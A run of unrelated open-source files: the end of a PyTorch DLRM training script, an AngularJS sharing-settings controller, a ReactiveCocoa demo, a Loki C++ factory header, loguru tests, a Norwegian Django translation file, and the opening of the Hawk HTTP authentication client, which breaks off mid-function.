validation_results['accuracy'] * 100, best_gA_test * 100 ) ) else: print( "Testing at - {}/{} of epoch {},".format(j + 1, nbatches, 0) + " loss {:.6f}, accuracy {:3.3f} %, best {:3.3f} %".format( gL_test, gA_test * 100, best_gA_test * 100 ) ) # Uncomment the line below to print out the total time with overhead # print("Total test time for this group: {}" \ # .format(time_wrap(use_gpu) - accum_test_time_begin)) if (args.mlperf_logging and (args.mlperf_acc_threshold > 0) and (best_gA_test > args.mlperf_acc_threshold)): print("MLPerf testing accuracy threshold " + str(args.mlperf_acc_threshold) + " reached, stop training") break if (args.mlperf_logging and (args.mlperf_auc_threshold > 0) and (best_auc_test > args.mlperf_auc_threshold)): print("MLPerf testing auc threshold " + str(args.mlperf_auc_threshold) + " reached, stop training") break k += 1 # nepochs # profiling if args.enable_profiling: with open("dlrm_s_pytorch.prof", "w") as prof_f: prof_f.write(prof.key_averages().table(sort_by="cpu_time_total")) prof.export_chrome_trace("./dlrm_s_pytorch.json") # print(prof.key_averages().table(sort_by="cpu_time_total")) # plot compute graph if args.plot_compute_graph: sys.exit( "ERROR: Please install pytorchviz package in order to use the" + " visualization. Then, uncomment its import above as well as" + " three lines below and run the code again." 
) # V = Z.mean() if args.inference_only else E # dot = make_dot(V, params=dict(dlrm.named_parameters())) # dot.render('dlrm_s_pytorch_graph') # write .pdf file # test prints if not args.inference_only and args.debug_mode: print("updated parameters (weights and bias):") for param in dlrm.parameters(): print(param.detach().cpu().numpy()) # export the model in onnx if args.save_onnx: dlrm_pytorch_onnx_file = "dlrm_s_pytorch.onnx" batch_size = X_onnx.shape[0] # debug prints # print("batch_size", batch_size) # print("inputs", X_onnx, lS_o_onnx, lS_i_onnx) # print("output", dlrm_wrap(X_onnx, lS_o_onnx, lS_i_onnx, use_gpu, device)) # force list conversion # if torch.is_tensor(lS_o_onnx): # lS_o_onnx = [lS_o_onnx[j] for j in range(len(lS_o_onnx))] # if torch.is_tensor(lS_i_onnx): # lS_i_onnx = [lS_i_onnx[j] for j in range(len(lS_i_onnx))] # force tensor conversion # if isinstance(lS_o_onnx, list): # lS_o_onnx = torch.stack(lS_o_onnx) # if isinstance(lS_i_onnx, list): # lS_i_onnx = torch.stack(lS_i_onnx) # debug prints print("X_onnx.shape", X_onnx.shape) if torch.is_tensor(lS_o_onnx): print("lS_o_onnx.shape", lS_o_onnx.shape) else: for oo in lS_o_onnx: print("oo.shape", oo.shape) if torch.is_tensor(lS_i_onnx): print("lS_i_onnx.shape", lS_i_onnx.shape) else: for ii in lS_i_onnx: print("ii.shape", ii.shape) # name inputs and outputs o_inputs = ["offsets"] if torch.is_tensor(lS_o_onnx) else ["offsets_"+str(i) for i in range(len(lS_o_onnx))] i_inputs = ["indices"] if torch.is_tensor(lS_i_onnx) else ["indices_"+str(i) for i in range(len(lS_i_onnx))] all_inputs = ["dense_x"] + o_inputs + i_inputs #debug prints print("inputs", all_inputs) # create dynamic_axis dictionaries do_inputs = [{'offsets': {1 : 'batch_size' }}] if torch.is_tensor(lS_o_onnx) else [{"offsets_"+str(i) :{0 : 'batch _size'}} for i in range(len(lS_o_onnx))] di_inputs = [{'indices': {1 : 'batch_size' }}] if torch.is_tensor(lS_i_onnx) else [{"indices_"+str(i) :{0 : 'batch _size'}} for i in range(len(lS_i_onnx))] 
dynamic_axes = {'dense_x' : {0 : 'batch _size'}, 'pred' : {0 : 'batch_size'}} for do in do_inputs: dynamic_axes.update(do) for di in di_inputs: dynamic_axes.update(di) # debug prints print(dynamic_axes) # export model torch.onnx.export( dlrm, (X_onnx, lS_o_onnx, lS_i_onnx), dlrm_pytorch_onnx_file, verbose=True, use_external_data_format=True, opset_version=11, input_names=all_inputs, output_names=["pred"], dynamic_axes=dynamic_axes ) # recover the model back dlrm_pytorch_onnx = onnx.load(dlrm_pytorch_onnx_file) # check the onnx model onnx.checker.check_model(dlrm_pytorch_onnx) ''' # run model using onnxruntime import onnxruntime as rt dict_inputs = {} dict_inputs["dense_x"] = X_onnx.numpy().astype(np.float32) if torch.is_tensor(lS_o_onnx): dict_inputs["offsets"] = lS_o_onnx.numpy().astype(np.int64) else: for i in range(len(lS_o_onnx)): dict_inputs["offsets_"+str(i)] = lS_o_onnx[i].numpy().astype(np.int64) if torch.is_tensor(lS_i_onnx): dict_inputs["indices"] = lS_i_onnx.numpy().astype(np.int64) else: for i in range(len(lS_i_onnx)): dict_inputs["indices_"+str(i)] = lS_i_onnx[i].numpy().astype(np.int64) print("dict_inputs", dict_inputs) sess = rt.InferenceSession(dlrm_pytorch_onnx_file, rt.SessionOptions()) prediction = sess.run(output_names=["pred"], input_feed=dict_inputs) print("prediction", prediction) '''
{ "pile_set_name": "Github" }
import tpl from './index.html'; import _ from 'lodash'; import { Set, Map } from 'immutable'; class ProjectPublishingController { constructor( $rootScope, $q, $log, $window, $state, $timeout, projectService, analysisService, tokenService, authService, paginationService ) { 'ngInject'; $rootScope.autoInject(this, arguments); } $onInit() { this.selectedLayers = new Set(); this.layersToAnalyses = new Map(); this.layerUrls = []; this.tileUrl = this.projectService.getProjectTileURL(this.project); this.showAnalyses = true; let sharePolicies = [ { label: 'Private', description: `Only you and those you create tokens for will be able to view tiles for this project`, enum: 'PRIVATE', active: false, enabled: true, token: true }, { label: 'Organization', description: `Users in your organization will be able to use their own tokens to view tiles for this project`, enum: 'ORGANIZATION', active: false, enabled: false, token: true }, { label: 'Public', description: 'Anyone can view tiles for this project without a token', enum: 'PUBLIC', active: false, enabled: true, token: false } ]; if (!this.templateTitle) { this.project = this.project; this.sharePolicies = sharePolicies.map(policy => { let isActive = policy.enum === this.project.tileVisibility; policy.active = isActive; return policy; }); this.activePolicy = this.sharePolicies.find(policy => policy.active); this.updateShareUrl(); } this.tileLayerUrls = { standard: null, arcGIS: null }; if (_.get(this, 'activePolicy.enum') === 'PRIVATE') { this.updateMapToken(); } this.fetchPage(); } fetchPage(page = this.$state.params.page || 1) { this.layerList = []; this.layerActions = {}; const currentQuery = this.projectService .getProjectLayers(this.project.id, { pageSize: 30, page: page - 1 }) .then( paginatedResponse => { this.layerList = paginatedResponse.results; this.layerList.forEach(layer => { layer.loadingAnalyses = true; this.analysisService .fetchAnalyses({ projectId: this.project.id, projectLayerId: layer.id, pageSize: 0, page: 
0 }) .then(paginatedAnalyses => { layer.loadingAnalyses = false; layer.analysisCount = paginatedAnalyses.count; }) .catch(e => { this.$log.error(e); layer.loadingAnalyses = false; }); }); const defaultLayer = this.layerList.find( l => l.id === this.project.defaultLayerId ); this.layerActions = []; this.pagination = this.paginationService.buildPagination(paginatedResponse); this.paginationService.updatePageParam(page); if (this.currentQuery === currentQuery) { delete this.fetchError; } }, e => { if (this.currentQuery === currentQuery) { this.fetchError = e; } } ) .finally(() => { if (this.currentQuery === currentQuery) { delete this.currentQuery; } }); this.currentQuery = currentQuery; return currentQuery; } toggleShowAnalyses() { this.showAnalyses = !this.showAnalyses; } onSelect(layer) { const without = this.selectedLayers.filter(i => i.id !== layer.id); if (without.size !== this.selectedLayers.size) { this.selectedLayers = without; } else { this.selectedLayers = this.selectedLayers.add(layer); } } updateAnalysesMap() { if (!this.showAnalyses) { return this.$q.reject(); } const selectedLayerIds = Set(this.selectedLayers.map(sl => sl.id)); const cachedLayerIds = Set(this.layersToAnalyses.keySeq().map(l => l.id)); const layerAnalysesToFetch = selectedLayerIds.subtract(cachedLayerIds); return this.$q.all(layerAnalysesToFetch.map(this.fetchLayerAnalyses.bind(this))); } updateMapToken() { return this.tokenService.getOrCreateProjectMapToken(this.project).then(t => { this.mapToken = t; return t; }); } isSelected(layer) { return this.selectedLayers.has(layer); } updateShareUrl() { this.projectService.getProjectShareURL(this.project, this.mapToken).then(url => { this.shareUrl = url; }); } onPolicyChange(policy, $event) { if (!this.updatingPolicy && this.activePolicy !== policy) { // TODO: Show spinner and disable checkboxes while updating this.updatingPolicy = true; if (this.project.owner.id) { this.project.owner = this.project.owner.id; } this.projectService 
.updateProject( Object.assign({}, this.project, { tileVisibility: policy.enum, visibility: policy.enum }) ) .then(() => { if (this.activePolicy) { this.activePolicy.active = false; } policy.active = true; this.activePolicy = policy; this.project.tileVisibility = policy.enum; this.project.visibility = policy.enum; if (_.get(this, 'activePolicy.enum') === 'PRIVATE') { this.updateMapToken().then(() => this.updateShareUrl()); } else { this.updateShareUrl(); } }) .catch(e => { this.$log.error('Error while updating project share policy', e); this.policyError = e; }) .finally(() => { this.updatingPolicy = false; }); } } onCopyClick(e, url, type) { if (url && url.length) { this.copyType = type; this.$timeout(() => { delete this.copyType; }, 1000); } } } const component = { bindings: { project: '<', tileUrl: '<', templateTitle: '<' }, templateUrl: tpl, controller: ProjectPublishingController.name }; export default angular .module('components.pages.projects.settings.publishing', []) .controller(ProjectPublishingController.name, ProjectPublishingController) .component('rfProjectPublishingPage', component).name;
{ "pile_set_name": "Github" }
// // ViewController.m // RACCommand // // Created by Mr.Wang on 16/4/18. // Copyright © 2016年 Mr.wang. All rights reserved. // #import "ViewController.h" #import "ReactiveCocoa.h" // RACCommand:RAC中用于处理事件的类,可以把事件如何处理,事件中的数据如何传递,包装到这个类中,他可以很方便的监控事件的执行过程,比如看事件有没有执行完毕 // 使用场景:监听按钮点击,网络请求 @interface ViewController () @end @implementation ViewController - (void)viewDidLoad { [super viewDidLoad]; // Do any additional setup after loading the view, typically from a nib. [self test5]; } // 普通做法 - (void)test1 { // RACCommand: 处理事件 // 不能返回空的信号 // 1.创建命令 RACCommand *command = [[RACCommand alloc] initWithSignalBlock:^RACSignal *(id input) { //block调用,执行命令的时候就会调用 NSLog(@"%@",input); // input 为执行命令传进来的参数 // 这里的返回值不允许为nil return [RACSignal createSignal:^RACDisposable *(id<RACSubscriber> subscriber) { [subscriber sendNext:@"执行命令产生的数据"]; return nil; }]; }]; // 如何拿到执行命令中产生的数据呢? // 订阅命令内部的信号 // ** 方式一:直接订阅执行命令返回的信号 // 2.执行命令 RACSignal *signal =[command execute:@2]; // 这里其实用到的是replaySubject 可以先发送命令再订阅 // 在这里就可以订阅信号了 [signal subscribeNext:^(id x) { NSLog(@"%@",x); }]; } // 一般做法 - (void)test2 { // 1.创建命令 RACCommand *command = [[RACCommand alloc] initWithSignalBlock:^RACSignal *(id input) { //block调用,执行命令的时候就会调用 NSLog(@"%@",input); // input 为执行命令传进来的参数 // 这里的返回值不允许为nil return [RACSignal createSignal:^RACDisposable *(id<RACSubscriber> subscriber) { [subscriber sendNext:@"执行命令产生的数据"]; return nil; }]; }]; // 方式二: // 订阅信号 // 注意:这里必须是先订阅才能发送命令 // executionSignals:信号源,信号中信号,signalofsignals:信号,发送数据就是信号 [command.executionSignals subscribeNext:^(RACSignal *x) { [x subscribeNext:^(id x) { NSLog(@"%@", x); }]; // NSLog(@"%@", x); }]; // 2.执行命令 [command execute:@2]; } // 高级做法 - (void)test3 { // 1.创建命令 RACCommand *command = [[RACCommand alloc] initWithSignalBlock:^RACSignal *(id input) { // block调用:执行命令的时候就会调用 NSLog(@"%@", input); // 这里的返回值不允许为nil return [RACSignal createSignal:^RACDisposable *(id<RACSubscriber> subscriber) { [subscriber sendNext:@"发送信号"]; return nil; }]; }]; // 方式三 // 
switchToLatest获取最新发送的信号,只能用于信号中信号。 [command.executionSignals.switchToLatest subscribeNext:^(id x) { NSLog(@"%@", x); }]; // 2.执行命令 [command execute:@3]; } // switchToLatest - (void)test4 { // 创建信号中信号 RACSubject *signalofsignals = [RACSubject subject]; RACSubject *signalA = [RACSubject subject]; // 订阅信号 // [signalofsignals subscribeNext:^(RACSignal *x) { // [x subscribeNext:^(id x) { // NSLog(@"%@", x); // }]; // }]; // switchToLatest: 获取信号中信号发送的最新信号 [signalofsignals.switchToLatest subscribeNext:^(id x) { NSLog(@"%@", x); }]; // 发送信号 [signalofsignals sendNext:signalA]; [signalA sendNext:@4]; } // 监听事件有没有完成 - (void)test5 { //注意:当前命令内部发送数据完成,一定要主动发送完成 // 1.创建命令 RACCommand *command = [[RACCommand alloc] initWithSignalBlock:^RACSignal *(id input) { // block调用:执行命令的时候就会调用 NSLog(@"%@", input); // 这里的返回值不允许为nil return [RACSignal createSignal:^RACDisposable *(id<RACSubscriber> subscriber) { // 发送数据 [subscriber sendNext:@"执行命令产生的数据"]; // *** 发送完成 ** [subscriber sendCompleted]; return nil; }]; }]; // 监听事件有没有完成 [command.executing subscribeNext:^(id x) { if ([x boolValue] == YES) { // 正在执行 NSLog(@"当前正在执行%@", x); }else { // 执行完成/没有执行 NSLog(@"执行完成/没有执行"); } }]; // 2.执行命令 [command execute:@1]; } - (void)didReceiveMemoryWarning { [super didReceiveMemoryWarning]; // Dispose of any resources that can be recreated. } @end
{ "pile_set_name": "Github" }
//////////////////////////////////////////////////////////////////////////////// // The Loki Library // Copyright (c) 2001 by Andrei Alexandrescu // This code accompanies the book: // Alexandrescu, Andrei. "Modern C++ Design: Generic Programming and Design // Patterns Applied". Copyright (c) 2001. Addison-Wesley. // Permission to use, copy, modify, distribute and sell this software for any // purpose is hereby granted without fee, provided that the above copyright // notice appear in all copies and that both that copyright notice and this // permission notice appear in supporting documentation. // The author or Addison-Wesley Longman make no representations about the // suitability of this software for any purpose. It is provided "as is" // without express or implied warranty. //////////////////////////////////////////////////////////////////////////////// #ifndef FACTORY_INC_ #define FACTORY_INC_ #include "LokiTypeInfo.h" #include "AssocVector.h" #include <exception> namespace Loki { //////////////////////////////////////////////////////////////////////////////// // class template DefaultFactoryError // Manages the "Unknown Type" error in an object factory //////////////////////////////////////////////////////////////////////////////// template <typename IdentifierType, class AbstractProduct> struct DefaultFactoryError { struct Exception : public std::exception { const char* what() const throw() { return "Unknown Type"; } }; static AbstractProduct* OnUnknownType(IdentifierType) { throw Exception(); } }; //////////////////////////////////////////////////////////////////////////////// // class template Factory // Implements a generic object factory //////////////////////////////////////////////////////////////////////////////// template < class AbstractProduct, typename IdentifierType, typename ProductCreator = AbstractProduct* (*)(), template<typename, class> class FactoryErrorPolicy = DefaultFactoryError > class Factory : public FactoryErrorPolicy<IdentifierType, 
AbstractProduct> { public: bool Register(const IdentifierType& id, ProductCreator creator) { return associations_.insert( typename IdToProductMap::value_type(id, creator)).second; } bool Unregister(const IdentifierType& id) { return associations_.erase(id) == 1; } AbstractProduct* CreateObject(const IdentifierType& id) { typename IdToProductMap::iterator i = associations_.find(id); if (i != associations_.end()) { return (i->second)(); } return this->OnUnknownType(id); } private: typedef AssocVector<IdentifierType, ProductCreator> IdToProductMap; IdToProductMap associations_; }; //////////////////////////////////////////////////////////////////////////////// // class template CloneFactory // Implements a generic cloning factory //////////////////////////////////////////////////////////////////////////////// template < class AbstractProduct, class ProductCreator = AbstractProduct* (*)(const AbstractProduct*), template<typename, class> class FactoryErrorPolicy = DefaultFactoryError > class CloneFactory : public FactoryErrorPolicy<TypeInfo, AbstractProduct> { public: bool Register(const TypeInfo& ti, ProductCreator creator) { return associations_.insert( typename IdToProductMap::value_type(ti, creator)).second; } bool Unregister(const TypeInfo& id) { return associations_.erase(id) == 1; } AbstractProduct* CreateObject(const AbstractProduct* model) { if (model == 0) return 0; typename IdToProductMap::iterator i = associations_.find(typeid(*model)); if (i != associations_.end()) { return (i->second)(model); } return this->OnUnknownType(typeid(*model)); } private: typedef AssocVector<TypeInfo, ProductCreator> IdToProductMap; IdToProductMap associations_; }; } // namespace Loki //////////////////////////////////////////////////////////////////////////////// // Change log: // June 20, 2001: ported by Nick Thurn to gcc 2.95.3. Kudos, Nick!!! // May 08, 2002: replaced const_iterator with iterator so that self-modifying // ProductCreators are supported. 
Also, added a throw() // spec to what(). Credit due to Jason Fischl. // February 2, 2003: fixed dependent names - credit due to Rani Sharoni // March 4, 2003: fixed dependent names - credit due to Ruslan Zasukhin and CW 8.3 //////////////////////////////////////////////////////////////////////////////// #endif // FACTORY_INC_
{ "pile_set_name": "Github" }
import sys import pytest from loguru import logger def test_handlers(capsys, tmpdir): file = tmpdir.join("test.log") handlers = [ {"sink": str(file), "format": "FileSink: {message}"}, {"sink": sys.stdout, "format": "StdoutSink: {message}"}, ] logger.configure(handlers=handlers) logger.debug("test") out, err = capsys.readouterr() assert file.read() == "FileSink: test\n" assert out == "StdoutSink: test\n" assert err == "" def test_levels(writer): levels = [{"name": "my_level", "icon": "X", "no": 12}, {"name": "DEBUG", "icon": "!"}] logger.add(writer, format="{level.no}|{level.name}|{level.icon}|{message}") logger.configure(levels=levels) logger.log("my_level", "test") logger.debug("no bug") assert writer.read() == ("12|my_level|X|test\n" "10|DEBUG|!|no bug\n") def test_extra(writer): extra = {"a": 1, "b": 9} logger.add(writer, format="{extra[a]} {extra[b]}") logger.configure(extra=extra) logger.debug("") assert writer.read() == "1 9\n" def test_patcher(writer): logger.add(writer, format="{extra[a]} {extra[b]}") logger.configure(patcher=lambda record: record["extra"].update(a=1, b=2)) logger.debug("") assert writer.read() == "1 2\n" def test_activation(writer): activation = [("tests", False), ("tests.test_configure", True)] logger.add(writer, format="{message}") logger.configure(activation=activation) logger.debug("Logging") assert writer.read() == "Logging\n" def test_dict_unpacking(writer): config = { "handlers": [{"sink": writer, "format": "{level.no} - {extra[x]} {extra[z]} - {message}"}], "levels": [{"name": "test", "no": 30}], "extra": {"x": 1, "y": 2, "z": 3}, } logger.debug("NOPE") logger.configure(**config) logger.log("test", "Yes!") assert writer.read() == "30 - 1 3 - Yes!\n" def test_returned_ids(capsys): ids = logger.configure( handlers=[ {"sink": sys.stdout, "format": "{message}"}, {"sink": sys.stderr, "format": "{message}"}, ] ) assert len(ids) == 2 logger.debug("Test") out, err = capsys.readouterr() assert out == "Test\n" assert err == "Test\n" for i in 
ids: logger.remove(i) logger.debug("Nope") out, err = capsys.readouterr() assert out == "" assert err == "" def test_dont_reset_by_default(writer): logger.configure(extra={"a": 1}, patcher=lambda r: r["extra"].update(b=2)) logger.level("b", no=30) logger.add(writer, format="{level} {extra[a]} {extra[b]} {message}") logger.configure() logger.log("b", "Test") assert writer.read() == "b 1 2 Test\n" def test_reset_previous_handlers(writer): logger.add(writer, format="{message}") logger.configure(handlers=[]) logger.debug("Test") assert writer.read() == "" def test_reset_previous_extra(writer): logger.configure(extra={"a": 123}) logger.add(writer, format="{extra[a]}", catch=False) logger.configure(extra={}) with pytest.raises(KeyError): logger.debug("Nope") def test_reset_previous_patcher(writer): logger.configure(patcher=lambda r: r.update(a=123)) logger.add(writer, format="{extra[a]}", catch=False) logger.configure(patcher=lambda r: None) with pytest.raises(KeyError): logger.debug("Nope") def test_dont_reset_previous_levels(writer): logger.level("abc", no=30) logger.configure(levels=[]) logger.add(writer, format="{level} {message}") logger.log("abc", "Test") assert writer.read() == "abc Test\n" def test_configure_handler_using_new_level(writer): logger.configure( levels=[{"name": "CONF_LVL", "no": 33, "icon": "", "color": ""}], handlers=[ {"sink": writer, "level": "CONF_LVL", "format": "{level.name} {level.no} {message}"} ], ) logger.log("CONF_LVL", "Custom") assert writer.read() == "CONF_LVL 33 Custom\n" def test_configure_filter_using_new_level(writer): logger.configure( levels=[{"name": "CONF_LVL_2", "no": 33, "icon": "", "color": ""}], handlers=[ {"sink": writer, "level": 0, "filter": {"tests": "CONF_LVL_2"}, "format": "{message}"} ], ) logger.log("CONF_LVL_2", "Custom") assert writer.read() == "Custom\n" def test_configure_before_bind(writer): logger.configure(extra={"a": "default_a", "b": "default_b"}) logger.add(writer, format="{extra[a]} {extra[b]} {message}") 
logger.debug("init") logger_a = logger.bind(a="A") logger_b = logger.bind(b="B") logger_a.debug("aaa") logger_b.debug("bbb") assert writer.read() == ("default_a default_b init\n" "A default_b aaa\n" "default_a B bbb\n") def test_configure_after_bind(writer): logger_a = logger.bind(a="A") logger_b = logger.bind(b="B") logger.configure(extra={"a": "default_a", "b": "default_b"}) logger.add(writer, format="{extra[a]} {extra[b]} {message}") logger.debug("init") logger_a.debug("aaa") logger_b.debug("bbb") assert writer.read() == ("default_a default_b init\n" "A default_b aaa\n" "default_a B bbb\n")
{ "pile_set_name": "Github" }
# This file is distributed under the same license as the Django package. # msgid "" msgstr "" "Project-Id-Version: Django\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2011-03-15 13:18-0400\n" "PO-Revision-Date: 2011-03-04 18:39+0000\n" "Last-Translator: Jannis <jannis@leidel.info>\n" "Language-Team: Norwegian <>\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "Language: no\n" "Plural-Forms: nplurals=2; plural=(n != 1)\n" #: templatetags/humanize.py:19 msgid "th" msgstr "." #: templatetags/humanize.py:19 msgid "st" msgstr "." #: templatetags/humanize.py:19 msgid "nd" msgstr "." #: templatetags/humanize.py:19 msgid "rd" msgstr "." #: templatetags/humanize.py:54 #, python-format msgid "%(value).1f million" msgid_plural "%(value).1f million" msgstr[0] "%(value).1f million" msgstr[1] "%(value).1f millioner" #: templatetags/humanize.py:57 #, python-format msgid "%(value).1f billion" msgid_plural "%(value).1f billion" msgstr[0] "%(value).1f milliard" msgstr[1] "%(value).1f milliarder" #: templatetags/humanize.py:60 #, python-format msgid "%(value).1f trillion" msgid_plural "%(value).1f trillion" msgstr[0] "%(value).1f billion" msgstr[1] "%(value).1f billioner" #: templatetags/humanize.py:76 msgid "one" msgstr "én" #: templatetags/humanize.py:76 msgid "two" msgstr "to" #: templatetags/humanize.py:76 msgid "three" msgstr "tre" #: templatetags/humanize.py:76 msgid "four" msgstr "fire" #: templatetags/humanize.py:76 msgid "five" msgstr "fem" #: templatetags/humanize.py:76 msgid "six" msgstr "seks" #: templatetags/humanize.py:76 msgid "seven" msgstr "sju" #: templatetags/humanize.py:76 msgid "eight" msgstr "åtte" #: templatetags/humanize.py:76 msgid "nine" msgstr "ni" #: templatetags/humanize.py:96 msgid "today" msgstr "i dag" #: templatetags/humanize.py:98 msgid "tomorrow" msgstr "i morgen" #: templatetags/humanize.py:100 msgid "yesterday" msgstr "i går"
{ "pile_set_name": "Github" }
/* HTTP Hawk Authentication Scheme Copyright (c) 2012-2014, Eran Hammer <eran@hammer.io> BSD Licensed */ // Declare namespace var hawk = { internals: {} }; hawk.client = { // Generate an Authorization header for a given request /* uri: 'http://example.com/resource?a=b' or object generated by hawk.utils.parseUri() method: HTTP verb (e.g. 'GET', 'POST') options: { // Required credentials: { id: 'dh37fgj492je', key: 'aoijedoaijsdlaksjdl', algorithm: 'sha256' // 'sha1', 'sha256' }, // Optional ext: 'application-specific', // Application specific data sent via the ext attribute timestamp: Date.now() / 1000, // A pre-calculated timestamp in seconds nonce: '2334f34f', // A pre-generated nonce localtimeOffsetMsec: 400, // Time offset to sync with server time (ignored if timestamp provided) payload: '{"some":"payload"}', // UTF-8 encoded string for body hash generation (ignored if hash provided) contentType: 'application/json', // Payload content-type (ignored if hash provided) hash: 'U4MKKSmiVxk37JCCrAVIjV=', // Pre-calculated payload hash app: '24s23423f34dx', // Oz application id dlg: '234sz34tww3sd' // Oz delegated-by application id } */ header: function (uri, method, options) { var result = { field: '', artifacts: {} }; // Validate inputs if (!uri || (typeof uri !== 'string' && typeof uri !== 'object') || !method || typeof method !== 'string' || !options || typeof options !== 'object') { result.err = 'Invalid argument type'; return result; } // Application time var timestamp = options.timestamp || hawk.utils.now(options.localtimeOffsetMsec); // Validate credentials var credentials = options.credentials; if (!credentials || !credentials.id || !credentials.key || !credentials.algorithm) { result.err = 'Invalid credentials object'; return result; } if (hawk.crypto.algorithms.indexOf(credentials.algorithm) === -1) { result.err = 'Unknown algorithm'; return result; } // Parse URI if (typeof uri === 'string') { uri = hawk.utils.parseUri(uri); } // Calculate signature var 
artifacts = { ts: timestamp, nonce: options.nonce || hawk.utils.randomString(6), method: method, resource: uri.resource, host: uri.host, port: uri.port, hash: options.hash, ext: options.ext, app: options.app, dlg: options.dlg }; result.artifacts = artifacts; // Calculate payload hash if (!artifacts.hash && (options.payload || options.payload === '')) { artifacts.hash = hawk.crypto.calculatePayloadHash(options.payload, credentials.algorithm, options.contentType); } var mac = hawk.crypto.calculateMac('header', credentials, artifacts); // Construct header var hasExt = artifacts.ext !== null && artifacts.ext !== undefined && artifacts.ext !== ''; // Other falsey values allowed var header = 'Hawk id="' + credentials.id + '", ts="' + artifacts.ts + '", nonce="' + artifacts.nonce + (artifacts.hash ? '", hash="' + artifacts.hash : '') + (hasExt ? '", ext="' + hawk.utils.escapeHeaderAttribute(artifacts.ext) : '') + '", mac="' + mac + '"'; if (artifacts.app) { header += ', app="' + artifacts.app + (artifacts.dlg ? '", dlg="' + artifacts.dlg : '') + '"'; } result.field = header; return result; }, // Generate a bewit value for a given URI /* uri: 'http://example.com/resource?a=b' options: { // Required credentials: { id: 'dh37fgj492je', key: 'aoijedoaijsdlaksjdl', algorithm: 'sha256' // 'sha1', 'sha256' }, ttlSec: 60 * 60, // TTL in seconds // Optional ext: 'application-specific', // Application specific data sent via the ext attribute localtimeOffsetMsec: 400 // Time offset to sync with server time }; */ bewit: function (uri, options) { // Validate inputs if (!uri || (typeof uri !== 'string') || !options || typeof options !== 'object' || !options.ttlSec) { return ''; } options.ext = (options.ext === null || options.ext === undefined ? 
'' : options.ext); // Zero is valid value // Application time var now = hawk.utils.now(options.localtimeOffsetMsec); // Validate credentials var credentials = options.credentials; if (!credentials || !credentials.id || !credentials.key || !credentials.algorithm) { return ''; } if (hawk.crypto.algorithms.indexOf(credentials.algorithm) === -1) { return ''; } // Parse URI uri = hawk.utils.parseUri(uri); // Calculate signature var exp = now + options.ttlSec; var mac = hawk.crypto.calculateMac('bewit', credentials, { ts: exp, nonce: '', method: 'GET', resource: uri.resource, // Maintain trailing '?' and query params host: uri.host, port: uri.port, ext: options.ext }); // Construct bewit: id\exp\mac\ext var bewit = credentials.id + '\\' + exp + '\\' + mac + '\\' + options.ext; return hawk.utils.base64urlEncode(bewit); }, // Validate server response /* request: object created via 'new XMLHttpRequest()' after response received artifacts: object received from header().artifacts options: { payload: optional payload received required: specifies if a Server-Authorization header is required. Defaults to 'false' } */ authenticate: function (request, credentials, artifacts, options) { options = options || {}; var getHeader = function (name) { return request.getResponseHeader ? 
request.getResponseHeader(name) : request.getHeader(name); }; var wwwAuthenticate = getHeader('www-authenticate'); if (wwwAuthenticate) { // Parse HTTP WWW-Authenticate header var wwwAttributes = hawk.utils.parseAuthorizationHeader(wwwAuthenticate, ['ts', 'tsm', 'error']); if (!wwwAttributes) { return false; } if (wwwAttributes.ts) { var tsm = hawk.crypto.calculateTsMac(wwwAttributes.ts, credentials); if (tsm !== wwwAttributes.tsm) { return false; } hawk.utils.setNtpOffset(wwwAttributes.ts - Math.floor((new Date()).getTime() / 1000)); // Keep offset at 1 second precision } } // Parse HTTP Server-Authorization header var serverAuthorization = getHeader('server-authorization'); if (!serverAuthorization && !options.required) { return true; } var attributes = hawk.utils.parseAuthorizationHeader(serverAuthorization, ['mac', 'ext', 'hash']); if (!attributes) { return false; } var modArtifacts = { ts: artifacts.ts, nonce: artifacts.nonce, method: artifacts.method, resource: artifacts.resource, host: artifacts.host, port: artifacts.port, hash: attributes.hash, ext: attributes.ext, app: artifacts.app, dlg: artifacts.dlg }; var mac = hawk.crypto.calculateMac('response', credentials, modArtifacts); if (mac !== attributes.mac) { return false; } if (!options.payload && options.payload !== '') { return true; } if (!attributes.hash) { return false; } var calculatedHash = hawk.crypto.calculatePayloadHash(options.payload, credentials.algorithm, getHeader('content-type')); return (calculatedHash === attributes.hash); }, message: function (host, port, message, options) { // Validate inputs if (!host || typeof host !== 'string' || !port || typeof port !== 'number' || message === null || message === undefined || typeof message !== 'string' || !options || typeof options !== 'object') { return null; } // Application time var timestamp = options.timestamp || hawk.utils.now(options.localtimeOffsetMsec); // Validate credentials var credentials = options.credentials; if (!credentials || 
!credentials.id || !credentials.key || !credentials.algorithm) { // Invalid credential object return null; } if (hawk.crypto.algorithms.indexOf(credentials.algorithm) === -1) { return null; } // Calculate signature var artifacts = { ts: timestamp, nonce: options.nonce || hawk.utils.randomString(6), host: host, port: port, hash: hawk.crypto.calculatePayloadHash(message, credentials.algorithm) }; // Construct authorization var result = { id: credentials.id, ts: artifacts.ts, nonce: artifacts.nonce, hash: artifacts.hash, mac: hawk.crypto.calculateMac('message', credentials, artifacts) }; return result; }, authenticateTimestamp: function (message, credentials, updateClock) { // updateClock defaults to true var tsm = hawk.crypto.calculateTsMac(message.ts, credentials); if (tsm !== message.tsm) { return false; } if (updateClock !== false) { hawk.utils.setNtpOffset(message.ts - Math.floor((new Date()).getTime() / 1000)); // Keep offset at 1 second precision } return true; } }; hawk.crypto = { headerVersion: '1', algorithms: ['sha1', 'sha256'], calculateMac: function (type, credentials, options) { var normalized = hawk.crypto.generateNormalizedString(type, options); var hmac = CryptoJS['Hmac' + credentials.algorithm.toUpperCase()](normalized, credentials.key); return hmac.toString(CryptoJS.enc.Base64); }, generateNormalizedString: function (type, options) { var normalized = 'hawk.' + hawk.crypto.headerVersion + '.' 
